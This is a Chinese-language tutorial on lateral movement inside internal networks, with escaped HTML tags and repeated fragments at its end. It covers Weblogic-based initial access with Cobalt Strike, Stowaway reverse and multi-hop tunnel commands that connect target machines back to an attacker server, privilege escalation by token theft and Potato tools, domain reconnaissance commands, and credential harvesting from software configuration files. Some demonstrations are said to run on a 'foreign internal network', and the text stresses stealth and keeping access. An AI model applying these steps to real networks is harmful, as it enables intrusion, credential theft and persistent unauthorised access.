内网横向渗透技术详解<\/h1>

前言<\/h2>
本文详细讲解内网横向渗透技术，涵盖权限获取、隧道搭建、权限提升和信息收集等关键环节，结合国外内网环境和本地内网靶机环境进行实战演示。<\/p>

1. 权限获取<\/h2>

1.1 初始入侵方式<\/h3>

通过Weblogic漏洞获取初始shell权限<\/li>
使用Cobalt Strike(CS)进行控制<\/li>

上线方式：

远程下载exe文件上线<\/li>

web投递上线（演示采用此方式）<\/li> <\/ul> <\/li> <\/ul>

2. 隧道搭建<\/h2>

2.1 反向隧道（国外内网演示）<\/h3>

适用场景<\/strong>：目标机器可以出网<\/p>

工具选择<\/strong>：<\/p>

frp<\/li>
nps<\/li>
Stowaway（演示采用此工具）<\/li> <\/ul>
实施步骤<\/strong>：<\/p>

服务端配置<\/strong>（攻击者机器）：<\/p>
.\/linux_x64_admin -l 5555<\/span> -s 7777<\/span> <\/span><\/span><\/code><\/pre> -l<\/code>：监听端口<\/li> -s<\/code>：密钥<\/li> <\/ul> <\/li> 被控端配置<\/strong>（目标机器）：<\/p> windows_x64_agent.exe -c 192.168.21.128:5555 -s 7777<\/span> --reconnect 10<\/span> <\/span><\/span><\/code><\/pre> -c<\/code>：服务端IP与端口<\/li> -s<\/code>：与服务端相同的密钥<\/li> --reconnect<\/code>：重连间隔<\/li> <\/ul> <\/li> 连接管理<\/strong>：<\/p> 服务端收到连接请求后，连接节点<\/li> 设置socks端口<\/li> 使用Proxifier连接隧道并配置代理规则<\/li> <\/ul> <\/li> <\/ol> 2.1.1 多级代理（本地内网靶机演示）<\/h3> 环境说明<\/strong>：<\/p> 网段：192.168.2.x、192.168.3.x、192.168.21.x<\/li> 192.168.21.x模拟外网网段<\/li> <\/ul> 实施步骤<\/strong>：<\/p> 第一级代理<\/strong>：<\/p> 服务端a启动（192.168.21.x）<\/li> 被控机b连接（192.168.2.x,192.168.21.x）<\/li> 服务端收到连接后执行： use 0<\/span> <\/span><\/span>socks 7788<\/span> <\/span><\/span><\/code><\/pre><\/li> 成功搭建被控机b网段的隧道<\/li> <\/ul> <\/li> 第二级代理<\/strong>：<\/p> 被控机c（只有192.168.2.x,192.168.3.x网段）<\/li> 服务端a执行： use 0<\/span> <\/span><\/span>listen <\/span><\/span><\/code><\/pre>输入1，输入监听端口7732<\/li> 被控机c执行连接命令（192.168.2.11为被控机b的IP，-s密钥与服务端a一致）<\/li> 服务端a执行： back <\/span><\/span>detail <\/span><\/span>use 1<\/span> <\/span><\/span>socks 6677<\/span> <\/span><\/span><\/code><\/pre><\/li> 再次设置代理服务器及代理规则，完成多级隧道搭建<\/li> <\/ul> <\/li> <\/ol> 2.2 正向隧道（本地内网靶机演示）<\/h3> 适用场景<\/strong>：目标机器不出网<\/p> 工具选择<\/strong>：<\/p> sou5<\/li> neoreg（演示采用sou5）<\/li> <\/ul> 实施步骤<\/strong>：<\/p> 目标服务器上传sou5代码<\/li> 本机连接目标的sou5文件<\/li> 通过Proxifier连接隧道<\/li> <\/ol> 3. 权限提升（国外内网演示）<\/h2> 注意<\/strong>：实际中administrator权限通常已足够，但有时需要system权限<\/p> 3.1 提权方法<\/h3> Cobalt Strike插件提权<\/strong>：<\/p> 进程注入<\/li> 令牌窃取<\/li> 以system权限上线CS<\/li> <\/ul> <\/li> 土豆系列工具<\/strong>：<\/p> 上传potato等提权工具进行提权<\/li> <\/ul> <\/li> 进程操作<\/strong>：<\/p> 查看进程列表<\/li> 挑选高权限进程进行令牌注入或进程窃取<\/li> <\/ul> <\/li> <\/ol> 4. 信息收集（国外内网演示）<\/h2> 4.1 基础信息收集命令<\/h3> ipconfig # 查看IP信息 <\/span><\/span>arp -a # 查看路由表 <\/span><\/span>systeminfo # 查看系统信息 <\/span><\/span>type<\/span> C:\Windows\System32\drivers\etc\hosts # 查看hosts文件 <\/span><\/span>net time \/domain # 查看当前域 <\/span><\/span>net view \/domain # 查看当前域 <\/span><\/span>nltest \/domain_trusts # 判断单域或多域 <\/span><\/span>setspn -q *\/* # 查看域SPN信息 <\/span><\/span>net group "Domain Computers"<\/span> \/domain # 查看域组成员 <\/span><\/span><\/code><\/pre>4.2 其他信息收集方法<\/h3> 服务器配置文件检查<\/strong>：<\/p> 查找数据库账号密码等敏感信息<\/li> 检查浏览器、xshell、todesk等软件的配置文件<\/li> <\/ul> <\/li> 密码收集工具<\/strong>：<\/p> Pillager<\/li> searchall<\/li> <\/ul> <\/li> 域控信息获取<\/strong>：<\/p> 通过net time \/domain<\/code>获取域控信息<\/li> 通过arp -a<\/code>分析路由表<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> 本教程详细介绍了内网横向渗透的全流程，从初始权限获取到隧道搭建，再到权限提升和信息收集。关键点包括：<\/p> 根据目标网络环境选择合适的隧道方式（反向\/正向）<\/li> 多级代理技术在内网穿透中的应用<\/li> 多种权限提升方法的灵活运用<\/li> 全面的信息收集策略<\/li> <\/ol> 实际渗透测试中，应根据目标环境特点灵活组合这些技术，并注意隐蔽性和权限维持。<\/p>

内网横向渗透技术详解<\/h1>

前言<\/h2> 本文详细讲解内网横向渗透技术，涵盖权限获取、隧道搭建、权限提升和信息收集等关键环节，结合国外内网环境和本地内网靶机环境进行实战演示。<\/p>

1. 权限获取<\/h2>

2. 隧道搭建<\/h2>

3. 权限提升（国外内网演示）<\/h2> 注意<\/strong>：实际中administrator权限通常已足够，但有时需要system权限<\/p>

4. 信息收集（国外内网演示）<\/h2>

前言<\/h2>
本文详细讲解内网横向渗透技术，涵盖权限获取、隧道搭建、权限提升和信息收集等关键环节，结合国外内网环境和本地内网靶机环境进行实战演示。<\/p>

3. 权限提升（国外内网演示）<\/h2>
注意<\/strong>：实际中administrator权限通常已足够，但有时需要system权限<\/p>